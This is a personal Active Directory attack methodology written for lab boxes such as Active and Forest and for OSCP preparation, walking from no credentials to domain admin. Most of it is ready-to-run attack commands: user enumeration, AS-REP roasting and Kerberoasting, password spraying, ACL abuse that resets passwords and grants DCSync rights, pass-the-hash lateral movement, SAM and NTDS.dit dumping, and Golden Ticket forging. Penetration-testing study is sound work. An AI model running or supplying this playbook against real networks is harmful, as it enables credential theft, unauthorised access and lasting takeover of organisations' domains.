AD Attack Methodology — From Zero to Domain Admin

Every AD box follows the same pattern. You start with nothing, you find a crack, you widen it, you own the domain. The chain is predictable. What changes is where each link breaks.

This is the methodology I follow on every AD box. Built from doing boxes like Active, Forest, Blackfield, and a bunch of others. Not theory — what I actually run.

Phase 0 — Setup

Before touching the box. 30 seconds of setup that prevents 30 minutes of confusion later.

Add the Domain to /etc/hosts

echo "$IP domain.htb dc01.domain.htb" | sudo tee -a /etc/hosts

Always add both the domain name and the DC hostname. Kerberos authentication requires proper hostname resolution. If your tools are failing with weird errors, check /etc/hosts first. I’ve wasted embarrassing amounts of time on this.

Sync Your Clock

sudo ntpdate -s $IP

Kerberos is time-sensitive. If your clock is more than 5 minutes off from the DC, authentication fails. No useful error message — just fails. Sync before you start.

Create Your Working Directory

mkdir -p {scans,loot,bloodhound}

You’re going to collect a lot of output. Stay organized or drown.

Phase 1 — No Credentials

You have nothing. The goal is simple: get a username, get a password, get anything.

1.1 — Null Session Enumeration

Try everything unauthenticated. Something usually talks.

# SMB null session
crackmapexec smb $IP -u '' -p ''
smbclient -N -L //$IP/
smbmap -H $IP -u '' -p ''

# RPC null session
rpcclient -U '' -N $IP
> enumdomusers
> enumdomgroups
> querydispinfo

# LDAP anonymous bind
ldapsearch -x -H ldap://$IP -b "DC=domain,DC=htb"

What I’m hunting for: Usernames. That’s the priority. One valid username opens doors.

On Forest, null RPC gave me the full user list. That was the entire foothold — AS-REP Roasting one of those users.

1.2 — User Enumeration via Kerberos

If null sessions give you nothing, Kerberos will often confirm valid usernames without triggering lockouts.

kerbrute userenum -d domain.htb --dc $IP /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

Valid users return a different response than invalid ones. No lockout risk. No failed logon events for valid users.

1.3 — AS-REP Roasting (Pre-Auth Disabled)

Once you have usernames — even just a few — try this immediately.

impacket-GetNPUsers domain.htb/ -dc-ip $IP -usersfile users.txt -no-pass -format hashcat

If any account has “Do not require Kerberos preauthentication” → you get a hash. Crack it.

hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt

This was the path on Forest. Null RPC → user list → AS-REP Roast → first creds. Clean chain.

1.4 — SMB Share Enumeration (Guest/Anonymous)

Some shares are readable without creds. Or with guest access.

smbmap -H $IP -u 'guest' -p ''
crackmapexec smb $IP -u 'guest' -p '' --shares

On Active, the Replication share was readable anonymously. Had a Groups.xml file with a GPP password. That was the foothold.

Always download and inspect everything in readable shares:

smbget -R smb://$IP/sharename/

Look for:

• GPP files (Groups.xml) — contain encrypted passwords, decryptable with gpp-decrypt
• Scripts — logon scripts, batch files, PowerShell scripts with hardcoded creds
• Config files — web.config, connection strings, anything with credentials
• Documentation — password policies, default passwords, onboarding docs

1.5 — SNMP Walk

If UDP 161 is open:

snmpwalk -v2c -c public $IP 1.3.6.1

SNMP can dump running processes, installed software, sometimes even command lines with credentials in them.

1.6 — DNS Zone Transfer

dig axfr @$IP domain.htb

Reveals subdomains, hostnames, sometimes other DCs or servers you didn’t know existed.

Decision Point — End of Phase 1

If you have credentials → Phase 2. If you have usernames but no passwords → password spray.

# Password spraying (careful with lockout!)
crackmapexec smb $IP -u users.txt -p 'Season2026!' --continue-on-success

Passwords to try: Welcome1, Password123, CompanyName2026!, Season+Year+!. Check the password policy first if you can:

crackmapexec smb $IP -u '' -p '' --pass-pol

If you have nothing at all → check web services, check for other attack vectors. Sometimes the AD foothold comes through a web app on the same box.

Phase 2 — First Credentials

You have a domain username and password. The game changes completely.

2.1 — Validate and Test Access

First, confirm what your creds can do.

# Test creds across services
crackmapexec smb $IP -u 'user' -p 'password'
crackmapexec winrm $IP -u 'user' -p 'password'
crackmapexec mssql $IP -u 'user' -p 'password'
crackmapexec ldap $IP -u 'user' -p 'password'

That (Pwn3d!) tag on WinRM means you have shell access. If you see it → evil-winrm in immediately.

evil-winrm -i $IP -u 'user' -p 'password'

2.2 — BloodHound Collection

Run this the moment you have valid creds. Not later. Now.

bloodhound-python -u 'user' -p 'password' -d domain.htb -ns $IP -c all

This collects users, groups, sessions, ACLs, trusts — everything. Import the JSON files into BloodHound.

What to look for in BloodHound:

1. “Shortest Path to Domain Admin” — obvious first check
2. “Shortest Path from Owned Principals” — mark your user as owned first
3. Kerberoastable accounts — check what SPNs exist
4. Users with DCSync rights
5. Accounts with dangerous permissions — GenericAll, GenericWrite, WriteDACL, ForceChangePassword, AddMember

On Blackfield, BloodHound showed that my compromised user had ForceChangePassword rights on another account. That was the entire privilege escalation path. Would have taken forever to find manually.

2.3 — Kerberoasting

Authenticated now. Target service accounts with SPNs.

impacket-GetUserSPNs domain.htb/user:password -dc-ip $IP -request -outputfile kerberoast.hash

Crack the hashes:

hashcat -m 13100 kerberoast.hash /usr/share/wordlists/rockyou.txt

Service accounts often have weak passwords and high privileges. On Active, Kerberoasting the Administrator account’s SPN gave me the domain. Straight from first creds to DA.

Prioritize cracking: Accounts in Domain Admins or with admin-level access (BloodHound tells you this).

2.4 — Authenticated Share Enumeration

You can see more shares now.

smbmap -H $IP -u 'user' -p 'password'
crackmapexec smb $IP -u 'user' -p 'password' --shares

Look for new shares that weren’t visible before. SYSVOL and NETLOGON are always worth checking:

smbclient //$IP/SYSVOL -U 'user%password'
smbclient //$IP/NETLOGON -U 'user%password'

SYSVOL contains group policies. NETLOGON contains logon scripts. Both can contain credentials.

2.5 — Authenticated LDAP Dump

# All users with details
ldapsearch -x -H ldap://$IP -D "user@domain.htb" -w 'password' -b "DC=domain,DC=htb" '(objectClass=person)' sAMAccountName description memberOf servicePrincipalName

# Computers
ldapsearch -x -H ldap://$IP -D "user@domain.htb" -w 'password' -b "DC=domain,DC=htb" '(objectClass=computer)' cn operatingSystem

Check description fields. Admins put passwords in there more often than you’d think.

2.6 — ACL Abuse

BloodHound found dangerous permissions? Time to exploit them.

GenericAll on a user:

# Reset their password
net rpc password "targetuser" "NewPass123!" -U "domain.htb/user%password" -S $IP

GenericWrite on a user:

# Set SPN for targeted Kerberoasting
impacket-addspn -u 'domain.htb/user' -p 'password' -t 'targetuser' -s 'HTTP/fake' "dc01.domain.htb"
# Then Kerberoast them

WriteDACL:

# Grant yourself DCSync rights
impacket-dacledit -action 'write' -rights 'DCSync' -principal 'user' -target-dn 'DC=domain,DC=htb' "domain.htb/user:password"

ForceChangePassword:

rpcclient -U 'user%password' $IP
> setuserinfo2 targetuser 23 'NewPass123!'

AddMember on a group:

net rpc group addmem "Target Group" "user" -U "domain.htb/user%password" -S $IP

Decision Point — End of Phase 2

Got admin creds? → Phase 4 (Domain Compromise). Got another user’s creds? → Repeat Phase 2 with new user, check what they can access. Got local admin on a machine? → Phase 3 (Lateral Movement). Stuck? → Check BloodHound again. Try different queries. Look at group memberships harder.

Phase 3 — Lateral Movement

You have credentials (password or hash) and need to move to other machines.

3.1 — Choose Your Tool

Decision tree for remote execution:

• Have password + WinRM open (5985)? → evil-winrm (cleanest shell)
• Have hash + WinRM open? → evil-winrm -H <hash> (Pass the Hash)
• Have password + no WinRM? → impacket-psexec (requires admin, drops to SYSTEM)
• Have hash + no WinRM? → impacket-psexec -hashes :NTLM_HASH (PtH)
• Need stealth? → impacket-wmiexec (less noisy than psexec)
• psexec failing? → impacket-smbexec or impacket-atexec as alternatives

# Evil-WinRM with password
evil-winrm -i $TARGET -u 'admin' -p 'password'

# Evil-WinRM with hash (Pass the Hash)
evil-winrm -i $TARGET -u 'admin' -H 'NTLM_HASH'

# PsExec with password
impacket-psexec domain.htb/admin:password@$TARGET

# PsExec with hash
impacket-psexec -hashes :NTLM_HASH domain.htb/admin@$TARGET

# WMIExec (less noisy)
impacket-wmiexec domain.htb/admin:password@$TARGET

3.2 — Credential Harvesting on Compromised Hosts

Once on a machine, harvest everything.

# Dump SAM (local accounts)
impacket-secretsdump admin:password@$TARGET

# Or from a shell:
reg save HKLM\SAM sam.bak
reg save HKLM\SYSTEM system.bak
# Download and extract offline:
impacket-secretsdump -sam sam.bak -system system.bak LOCAL

Look for:

• Local admin hashes (reused across machines?)
• Cached domain credentials
• LSA secrets

3.3 — Credential Reuse

The #1 lateral movement technique. Try every credential you have against every machine.

# Spray a hash across all hosts
crackmapexec smb targets.txt -u 'admin' -H 'NTLM_HASH' --continue-on-success

Local admin password reuse is extremely common. One hash often gives you multiple machines.

3.4 — Token / Session Abuse (From a Shell)

If you have a shell on a machine where a privileged user is logged in:

# Check for tokens (requires SeImpersonatePrivilege)
# Use tools like Rubeus, Incognito, or PrintSpoofer
whoami /priv

If you have SeImpersonatePrivilege → Potato attacks (PrintSpoofer, GodPotato, etc.) for SYSTEM.

Phase 4 — Domain Compromise

You have Domain Admin equivalent access. Time to prove it.

4.1 — DCSync

The cleanest way to dump all domain hashes. Requires replication rights (Domain Admins have this by default).

impacket-secretsdump domain.htb/admin:password@$DC_IP

This dumps:

• All domain user NTLM hashes (including krbtgt)
• All domain computer hashes
• Kerberos keys

You want the Administrator NTLM hash and the krbtgt hash.

# DCSync just the Administrator
impacket-secretsdump -just-dc-user Administrator domain.htb/admin:password@$DC_IP

# DCSync just krbtgt (for Golden Ticket)
impacket-secretsdump -just-dc-user krbtgt domain.htb/admin:password@$DC_IP

4.2 — NTDS.dit Extraction

Alternative to DCSync. Grab the database file directly.

# From an admin shell on the DC
# Create a shadow copy
vssadmin create shadow /for=C:

# Copy NTDS.dit from the shadow
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\system.bak

# Download both files, then extract offline
impacket-secretsdump -ntds ntds.dit -system system.bak LOCAL

4.3 — Golden Ticket

With the krbtgt hash, you can forge tickets for any user. Persistence that survives password resets (except krbtgt reset).

# Get domain SID
impacket-lookupsid domain.htb/admin:password@$DC_IP

# Forge Golden Ticket
impacket-ticketer -nthash <KRBTGT_HASH> -domain-sid <DOMAIN_SID> -domain domain.htb Administrator

# Use it
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass domain.htb/Administrator@dc01.domain.htb

For OSCP, DCSync is usually enough to prove domain compromise. Golden Ticket is good to understand but overkill for most exam scenarios.

4.4 — Pass the Hash to Domain Controller

If you have the DA NTLM hash, just use it directly.

# Shell on the DC
impacket-psexec -hashes :DA_NTLM_HASH domain.htb/Administrator@$DC_IP
evil-winrm -i $DC_IP -u 'Administrator' -H 'DA_NTLM_HASH'

Simplest path. Hash from DCSync → PtH → shell on DC → proof.txt.

The Full Chain — Visual

Phase 1 (No Creds)
├── Null sessions → usernames
├── Kerberos user enum → usernames
├── AS-REP Roasting → password hash
├── Anonymous shares → credentials/info
├── SNMP/DNS → info gathering
└── Password spraying → first creds
         │
         ▼
Phase 2 (First Creds)
├── BloodHound → attack paths
├── Kerberoasting → service account hashes
├── Share enumeration → more creds/info
├── LDAP dump → users, descriptions, groups
├── ACL abuse → privilege escalation
└── Credential reuse → more access
         │
         ▼
Phase 3 (Lateral Movement)
├── Pass the Hash → other machines
├── Evil-WinRM → shells
├── PsExec/WMIExec → shells
├── SAM/LSA dumps → more hashes
└── Token abuse → higher privileges
         │
         ▼
Phase 4 (Domain Compromise)
├── DCSync → all hashes
├── NTDS.dit → offline extraction
├── Golden Ticket → persistence
└── PtH as DA → proof.txt

Common Mistakes I’ve Made on AD Boxes

1. Not running BloodHound immediately. I used to manually enumerate after getting creds. BloodHound shows paths in seconds that take hours to find manually. Run it first. Always.

2. Forgetting to sync time. Kerberos tools fail silently or with cryptic errors when clocks are out of sync. ntpdate before starting.

3. Not checking ACLs. The path to DA is often through ACL abuse, not direct exploitation. BloodHound’s edge analysis is where the gold is.

4. Trying to crack everything. Not every Kerberoast hash will crack. If it doesn’t crack in 5 minutes with rockyou, move on and look for another path.

5. Ignoring password reuse. One set of creds should be tested against every service, every machine. crackmapexec with --continue-on-success across all discovered hosts.

6. Not adding discovered hostnames to /etc/hosts. Every hostname you find in BloodHound or LDAP — add it. Some tools require proper name resolution.

Cheat Sheet — Tools by Phase

The chain is always the same: enumerate → find a crack → escalate → repeat until DA. What changes is where you find each crack. BloodHound and methodical enumeration find it faster than guessing ever will.